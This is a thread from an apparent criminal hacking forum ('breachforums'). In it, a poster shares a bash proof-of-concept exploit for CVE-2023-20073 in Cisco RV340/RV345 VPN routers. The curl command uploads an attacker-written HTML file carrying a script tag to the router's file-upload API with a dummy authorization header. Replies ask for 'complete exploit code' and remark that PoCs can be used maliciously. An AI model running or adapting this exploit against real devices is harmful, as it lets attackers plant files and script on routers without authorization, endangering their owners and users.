[Aegis]

CVE-2023-20073

Downloading an arbitrary file without authentication (XSS) in VPN routers:

A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device. 

#!/usr/bin/bash
TARGET="https://0.0.0.0"; \
FILENAME="login.html"; \
echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \
curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \
echo "Access the uploaded file through the following link: $TARGET/$FILENAME"

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Self-Ban | https://breachforums.rs/Forum-Ban-Appeals if you wish to be unbanned in the future.

[vulture]

good share, was this poc already public or you created from scratch ?

[breachy1]

bro this is just a poc. i've seen it before. come back with the complete exploit code

[lildrainer]

bro this is just a poc. i've seen it before. come back with the complete exploit code

The whole point of a PoC is to show how it's done in example format. This can be used maliciously with actual knowledge on a combination of things. Mostly expertise in programming, NetSec, programming principles etc. Either way, it's up to you what you do with a PoC.